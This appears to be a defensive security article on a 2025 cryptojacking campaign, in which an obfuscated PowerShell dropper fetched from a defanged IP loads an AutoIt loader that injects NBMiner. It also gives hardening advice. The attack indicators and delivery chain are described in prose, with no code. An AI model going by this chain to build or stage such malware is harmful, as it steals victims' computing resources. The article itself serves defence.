Defending Against PowerShell-Based Cryptomining Attacks: Security Best Practices for Crypto Users

On September 3, 2025, cybersecurity firm Darktrace published a detailed analysis of a novel cryptomining malware campaign that bypassed conventional security tools through sophisticated PowerShell-based payloads. The incident, detected at a retail and e-commerce company in July 2025, represents the first documented case of the NBMiner cryptominer being delivered via an obfuscated AutoIt loader—highlighting the evolving sophistication of cryptojacking threats in an environment where the total cryptocurrency market capitalization approaches $4 trillion.

The Threat Landscape

Cryptojacking—the unauthorized use of computing resources to mine cryptocurrency—remains one of the most persistent cyber threats in the digital age. Unlike ransomware, which disrupts operations and demands payment, cryptomining malware operates silently, stealing processing power and energy resources to generate profit for attackers. The impact accumulates over time: reduced system performance, shortened hardware lifespans, inflated energy costs, and potential data privacy violations.

The Darktrace incident demonstrates how threat actors are refining their techniques. In July 2025, Darktrace detected a compromised desktop device establishing a connection to a rare endpoint at 45.141.87[.]195 over port 8000 using HTTP. The connection carried a PowerShell user agent string, indicating remote code execution. The URI contained ‘/infect.ps1’—a heavily obfuscated PowerShell script that served as a dropper for an AutoIt loader, which subsequently injected NBMiner into a legitimate system process.

This attack chain—PowerScript to obfuscated loader to process injection to cryptominer—represents a multistage approach designed to evade signature-based detection at every level. The global cryptocurrency market cap hovering near $4 trillion makes cryptojacking an increasingly attractive enterprise for threat actors who can monetize stolen compute resources with minimal risk compared to ransomware operations.

Core Principles

Effective defense against cryptomining malware rests on several foundational security principles:

Behavioral Detection Over Signatures: The NBMiner attack bypassed traditional antivirus because the payload was delivered through legitimate scripting languages (PowerShell, AutoIt) and injected into trusted processes. Behavioral analysis tools that monitor for anomalous CPU usage, unusual network connections, and unexpected process spawning are essential for detecting these multi-layered attacks.

Network Monitoring: Darktrace identified the initial compromise by detecting a new PowerShell user agent connecting to a previously unseen external endpoint. Continuous network traffic analysis provides early warning indicators that endpoint solutions alone cannot deliver.

Least Privilege Access: Restricting PowerShell execution rights and limiting script capabilities through Group Policy or application whitelisting significantly reduces the attack surface. Organizations should disable PowerShell remoting where it is not explicitly required and enforce Constrained Language Mode.

Tooling and Setup

Building an effective cryptomining defense requires specific tools and configurations:

• Endpoint Detection and Response (EDR): Deploy EDR solutions that monitor process behavior, not just file hashes. Look for capabilities like memory scanning, process injection detection, and automated response actions that can isolate compromised endpoints in real time
• Network Traffic Analysis (NTA): Implement network monitoring tools that baseline normal traffic patterns and flag deviations. Darktrace’s success in this incident demonstrates the value of AI-driven network analysis
• DNS Filtering: Block connections to known cryptomining pool domains and suspicious infrastructure. Many cryptominers communicate with mining pools on non-standard ports
• PowerShell Security: Enable PowerShell script block logging, module logging, and transcription. Configure AppLocker or Windows Defender Application Control to restrict script execution to approved sources only

Ongoing Vigilance

Cryptomining threats continue to evolve alongside the cryptocurrency market. Several trends demand ongoing attention:

Supply chain attacks represent a growing vector for cryptominer distribution. The npm compromise discovered in September 2025—where attackers phished developer credentials through spoofed domains to inject malicious code into 18 widely-used JavaScript packages—demonstrates how trusted software ecosystems can be weaponized.

Browser-based cryptojacking remains a low-barrier entry point. JavaScript-based mining scripts injected into compromised websites can hijack visitor CPUs without installing any software. Organizations should deploy browser extensions that block known mining scripts and monitor web traffic for CoinHive-style patterns.

The rise of legitimate cryptomining services also creates cover for malicious activity. IT teams should maintain an inventory of authorized mining operations and investigate any cryptomining software or network connections not on the approved list.

Final Takeaway

The Darktrace cryptomining incident illustrates a broader pattern in cybersecurity: attackers exploit the gap between what security tools expect and what actually happens on the network. The PowerShell-to-AutoIt-to-NBMiner delivery chain succeeded because each stage used legitimate tools in malicious ways, evading signature-based detection at every step.

For individual cryptocurrency users, the risk extends beyond organizational networks. Personal devices running wallet software or participating in DeFi protocols are attractive targets for cryptojackers who can mine smaller cryptocurrencies using stolen resources. Users should monitor system performance for unexplained CPU spikes, install reputable endpoint protection, and keep all software updated—basic hygiene that prevents the vast majority of cryptomining infections.

With Bitcoin at approximately $111,700 and Ethereum around $4,450, the economic incentives driving cryptojacking will only intensify. Security practices must evolve at the same pace as the threats they aim to counter.